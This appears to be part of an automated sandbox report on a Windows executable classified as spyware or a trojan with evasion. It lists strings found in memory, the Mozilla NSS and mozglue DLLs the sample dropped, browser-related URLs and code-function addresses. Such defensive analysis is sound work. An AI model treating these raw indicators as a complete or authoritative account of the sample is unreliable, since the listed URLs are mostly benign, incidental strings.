Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883712196.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GCGDGHCB.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: GCGDGHCB.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://support.mozilla.org
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: GCGDGHCB.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/eBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VS
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: i3NmF0obCm.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C53B700
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C53B8C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C53B910
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4DF280
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4D35A0 0_2_6C4D35A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C54545C 0_2_6C54545C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E5440 0_2_6C4E5440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C515C10 0_2_6C515C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C522C10 0_2_6C522C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C54AC00 0_2_6C54AC00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C54542B 0_2_6C54542B
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E64C0 0_2_6C4E64C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FD4D0 0_2_6C4FD4D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C516CF0 0_2_6C516CF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DD4E0 0_2_6C4DD4E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E6C80 0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5334A0 0_2_6C5334A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C53C4A0 0_2_6C53C4A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C500512 0_2_6C500512
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4EFD00 0_2_6C4EFD00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FED10 0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C510DD0 0_2_6C510DD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5385F0 0_2_6C5385F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C513E50 0_2_6C513E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4F4640 0_2_6C4F4640
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C522E4E 0_2_6C522E4E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4F9E50 0_2_6C4F9E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C546E63 0_2_6C546E63
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DC670 0_2_6C4DC670
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C517E10 0_2_6C517E10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C525600 0_2_6C525600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C539E30 0_2_6C539E30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5476E3 0_2_6C5476E3
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DBEF0 0_2_6C4DBEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4EFEF0 0_2_6C4EFEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C53E680 0_2_6C53E680
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4F5E90 0_2_6C4F5E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C534EA0 0_2_6C534EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C517710 0_2_6C517710
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E9F00 0_2_6C4E9F00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C506FF0 0_2_6C506FF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DDFE0 0_2_6C4DDFE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5277A0 0_2_6C5277A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4F8850 0_2_6C4F8850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FD850 0_2_6C4FD850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C51F070 0_2_6C51F070
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E7810 0_2_6C4E7810
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C51B820 0_2_6C51B820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C524820 0_2_6C524820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5450C7 0_2_6C5450C7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FC0E0 0_2_6C4FC0E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5158E0 0_2_6C5158E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5060A0 0_2_6C5060A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4FA940 0_2_6C4FA940
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C52B970 0_2_6C52B970
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C54B170 0_2_6C54B170
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4ED960 0_2_6C4ED960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C515190 0_2_6C515190
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C532990 0_2_6C532990
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C50D9B0 0_2_6C50D9B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DC9A0 0_2_6C4DC9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C519A60 0_2_6C519A60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C518AC0 0_2_6C518AC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C51E2F0 0_2_6C51E2F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4F1AF0 0_2_6C4F1AF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C54BA90 0_2_6C54BA90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C542AB0 0_2_6C542AB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4D22A0 0_2_6C4D22A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C504AA0 0_2_6C504AA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4ECAB0 0_2_6C4ECAB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4D5340 0_2_6C4D5340
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4EC370 0_2_6C4EC370
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C51D320 0_2_6C51D320
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5453C8 0_2_6C5453C8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4DF380 0_2_6C4DF380
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C58AC60 0_2_6C58AC60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C65AC30 0_2_6C65AC30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C646C00 0_2_6C646C00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5DECD0 0_2_6C5DECD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C57ECC0 0_2_6C57ECC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C64ED70 0_2_6C64ED70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6AAD50 0_2_6C6AAD50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C708D20 0_2_6C708D20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C70CDC0 0_2_6C70CDC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C584DB0 0_2_6C584DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C616D90 0_2_6C616D90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C61EE70 0_2_6C61EE70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C660E20 0_2_6C660E20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C58AEC0 0_2_6C58AEC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C620EC0 0_2_6C620EC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C606E90 0_2_6C606E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C642F70 0_2_6C642F70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5EEF40 0_2_6C5EEF40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C586F10 0_2_6C586F10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6C0F20 0_2_6C6C0F20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C65EFF0 0_2_6C65EFF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C580FE0 0_2_6C580FE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6C8FB0 0_2_6C6C8FB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C58EFB0 0_2_6C58EFB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C654840 0_2_6C654840
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C60A820 0_2_6C60A820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5D0820 0_2_6C5D0820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6868E0 0_2_6C6868E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5B8960 0_2_6C5B8960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5D6900 0_2_6C5D6900
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C69C9E0 0_2_6C69C9E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5B49F0 0_2_6C5B49F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6109A0 0_2_6C6109A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C63A9A0 0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6409B0 0_2_6C6409B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5FCA70 0_2_6C5FCA70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C638A30 0_2_6C638A30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C62EA00 0_2_6C62EA00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5FEA80 0_2_6C5FEA80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C686BE0 0_2_6C686BE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C620BA0 0_2_6C620BA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C598460 0_2_6C598460
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C60A430 0_2_6C60A430
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5E4420 0_2_6C5E4420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C5C64D0 0_2_6C5C64D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C61A4D0 0_2_6C61A4D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 6C5A3620 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 6C70DAE0 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 00EE43D0 appears 315 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: String function: 6C7009D0 appears 121 times
Source: i3NmF0obCm.exe, 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs i3NmF0obCm.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs i3NmF0obCm.exe
Source: i3NmF0obCm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C537030
